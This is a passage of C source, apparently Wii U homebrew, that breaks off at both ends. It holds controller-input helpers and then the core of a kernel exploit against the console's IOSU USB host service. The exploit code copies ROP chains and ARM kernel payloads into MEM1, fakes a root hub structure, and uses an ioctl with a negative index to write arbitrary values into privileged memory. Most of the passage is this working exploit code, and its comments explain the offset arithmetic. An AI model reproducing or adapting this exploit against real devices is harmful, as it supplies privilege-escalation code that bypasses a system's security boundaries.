VPAD_BUTTON_R; if(buttons & WPAD_CLASSIC_BUTTON_L) conv_buttons |= VPAD_BUTTON_L; return conv_buttons; } static unsigned int getButtonsDown(unsigned int padscore_handle, unsigned int vpad_handle) { int(*WPADProbe)(int chan, int * pad_type); int(*KPADRead)(int chan, void * data, int size); OSDynLoad_FindExport(padscore_handle, 0, "WPADProbe",&WPADProbe); OSDynLoad_FindExport(padscore_handle, 0, "KPADRead",&KPADRead); unsigned int btnDown = 0; int(*VPADRead)(int controller, VPADData *buffer, unsigned int num, int *error); OSDynLoad_FindExport(vpad_handle, 0, "VPADRead", &VPADRead); int vpadError = -1; VPADData vpad; VPADRead(0, &vpad, 1, &vpadError); if(vpadError == 0) btnDown |= vpad.btns_d; int i; for(i = 0; i < 4; i++) { int controller_type; if(WPADProbe(i, &controller_type) != 0) continue; KPADData kpadData; KPADRead(i, &kpadData, 1); if(kpadData.device_type <= 1) btnDown |= wpadToVpad(kpadData.btns_d); else btnDown |= wpadClassicToVpad(kpadData.classic.btns_d); } return btnDown; } static void uhs_exploit_init(unsigned int coreinit_handle) { void (*DCStoreRange)(const void *addr, uint32_t length); OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); //! Clear out our used MEM1 area memset((void*)0xF5E00000, 0, 0x00070000); DCStoreRange((void*)0xF5E00000, 0x00070000); //!------Variables used in exploit------ int *pretend_root_hub = (int*)0xF5E60640; int *ayylmao = (int*)0xF5E00000; //!------------------------------------- ayylmao[5] = 1; ayylmao[8] = 0x1E00000; memcpy((char*)(0xF5E20000), second_chain, sizeof(second_chain)); memcpy((char*)(0xF5E30000), final_chain, sizeof(final_chain)); memcpy((char*)(0xF5E40000), arm_kernel_bin, sizeof(arm_kernel_bin)); memcpy((char*)(0xF5E50000), arm_user_bin, sizeof(arm_user_bin)); pretend_root_hub[33] = 0x1E00000; pretend_root_hub[78] = 0; //! Store current CPU cache into main memory for IOSU to read DCStoreRange(ayylmao, 0x840); DCStoreRange((void*)0xF5E20000, sizeof(second_chain)); DCStoreRange((void*)0xF5E30000, sizeof(final_chain)); DCStoreRange((void*)0xF5E40000, sizeof(arm_kernel_bin)); DCStoreRange((void*)0xF5E50000, sizeof(arm_user_bin)); DCStoreRange(pretend_root_hub, 0x160); } static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val) { void (*DCStoreRange)(const void *addr, uint32_t length); void (*OSSleepTicks)(uint64_t ticks); int (*IOS_Ioctl)(int fd, uint32_t request, void *input_buffer,uint32_t input_buffer_len, void *output_buffer, uint32_t output_buffer_len); OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks); OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl); //!------Variables used in exploit------ int *ayylmao = (int*)0xF5E00000; //!------------------------------------- ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes DCStoreRange(ayylmao, 0x840); //! Store current CPU cache into main memory for IOSU to read OSSleepTicks(0x200000); //! Wait for caches to refresh over in IOSU //! index 0 is at 0x10149A6C, each index is 0x144 bytes long, so 0x10149A6C - (0x144*0xB349B) = 0x1E60640, //! which is the physical address of 0xF5E60640 for us, right at the end of MEM1 int request_buffer[] = { -(0xB349B), val }; int output_buffer[32]; return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer)); }